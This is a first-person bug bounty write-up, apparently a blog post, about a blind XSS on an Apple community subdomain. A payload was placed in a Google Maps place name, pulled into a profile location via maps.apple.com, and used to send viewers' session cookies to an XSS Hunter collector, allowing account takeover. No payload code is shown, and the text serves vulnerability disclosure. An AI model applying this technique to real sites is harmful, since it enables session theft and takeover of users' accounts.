How I got a Bug At Apple that lead’s to takeover accounts of any user who view my profile

Hi Team Iam Abdelkader Mouaz my pseudo is Hamzadzworm today i will share with you a Bug That Lead To Takeover account of any user just if he view my profile

I Was Hunting On Apple For Few Days, I Try to Do Subdomain Enumeration Using Multipe Tools To Get All possible Subdomains I Was Able To get About 20K Live Subdomain it Was A Big list but I had A lot Of time I keeped Testing Them One By One

I found an interesting One It Was A community Subdomain That You Can Log in into It With Your I Cloud Account so i was thinking That If I get An Account Takeover There I Will Be Able To Takeover Icloud Accounts

i keep searching For Few Days Untile I got An Interesting Endpoint It Was Location One where Iam Able To put Location On My Profile But I Couldn’t Do That Manually

Location Adresss eWere Added Automatically By Putting Adresse And it was picking this Automatique Locations From Apple Maps thats an exemple For It

maps.apple.com/?&q=Test&address=Test

it was redirecting me to google maps with an input Test/Test

it was an interesting thing so i go to add a new map thats non listed in google map then share it using the endpoint i found:

maps.apple.com/?&q=Test&address=Test

after i was able to add the map i put a blind xss payload in google place name then sent it and it was accepted it wasnt executed in google for sure

but after i link it with maps.apple.com becasue apple maps taking map from google map i was able to make a finall payload and add it in my profile location and

it Was At (Lieu) which mean Location As You See in the Screen Bellow

And Yey Its Executed

Then I Added A Blind Xss Payload At Map And Opened New Account And Try To View My Profile That Contain Blind Xss And Its Fired And I got cookies Of Account At My Xss Hunter Account Which Allowed Me To Takeover The Account

I Hope You Enjoyed The Write Up Let A Comment For Me If you Liked it -.- :)